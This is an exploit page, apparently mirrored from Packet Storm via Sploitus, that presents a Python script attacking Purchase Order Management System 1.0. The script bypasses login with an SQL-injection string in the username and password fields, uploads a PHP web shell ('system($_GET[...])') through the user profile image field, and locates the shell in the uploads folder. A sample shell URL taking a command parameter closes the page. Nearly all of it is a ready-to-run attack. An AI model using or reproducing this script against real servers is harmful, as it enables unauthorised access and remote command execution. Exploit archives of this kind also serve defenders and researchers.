Share
## https://sploitus.com/exploit?id=PACKETSTORM:164135
# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload  
# Date: 2021-09-14   
# Exploit Author: Aryan Chehreghani  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html  
# Version: v1.0  
# Tested on: Windows 10 - XAMPP Server   
  
# [ About the Purchase Order Management System ] :  
#This Purchase Order Management System can store the list of all company's,  
#suppliers for easily retrieving the suppliers' data upon generating the purchase order.  
#It also stores the list of Items that the company possibly purchased from their suppliers.  
#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations.   
#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.  
  
#!/bin/env python3  
import requests  
import time  
import sys  
from colorama import Fore, Style  
if len(sys.argv) !=2:  
print ('''  
###########################################################   
#Purchase Order Management System 1.0 - Remote File Upload#  
# BY:Aryan Chehreghani #  
# Team:TAPESH DIGITAL SECURITY TEAM IRAN #  
# mail:aryanchehreghani@yahoo.com #   
# -+-USE:python script.py <target url> #   
# [+]Example:python3 script.py http://127.0.0.1/ #  
###########################################################  
''')  
else:  
try:  
url = sys.argv[1]  
print()  
print('[*] Trying to login...')  
time.sleep(1)  
login = url + '/classes/Login.php?f=login'  
payload_name = "shell.php"  
payload_file = r"""<?php @system($_GET['tapesh']); ?>"""  
session = requests.session()  
post_data = {"username": "'=''or'", "password": "'=''or'"}  
user_login = session.post(login, data=post_data)  
cookie = session.cookies.get_dict()  
  
if user_login.text == '{"status":"success"}':  
print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')  
upload_url = url + "/classes/Users.php?f=save"  
cookies = cookie  
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------221231088029122460852571642112", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/leave_system/admin/?page=user"}  
data = "-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n\n " + payload_file + "\n\n\r\n-----------------------------221231088029122460852571642112--\r\n"  
print('[*] Trying to shell...')  
time.sleep(2)  
  
try:  
print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')  
upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)  
upload_check = f'{url}/uploads'  
r = requests.get(upload_check)  
if payload_name in r.text:  
  
payloads = r.text.split('<a href="')  
for load in payloads:  
  
if payload_name in load:  
payload = load.split('"')  
payload = payload[0]  
else:  
pass  
else:  
exit()  
  
except:  
print ("Upload failed try again\n")  
exit()  
  
try:  
print("Check Your Target ;)\n")  
  
  
except:  
print("Failed to find shell\n")  
  
else:  
print("Login failed!\n")  
  
except:  
print("Something Went Wrong!\n")  
  
#########################################################  
#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir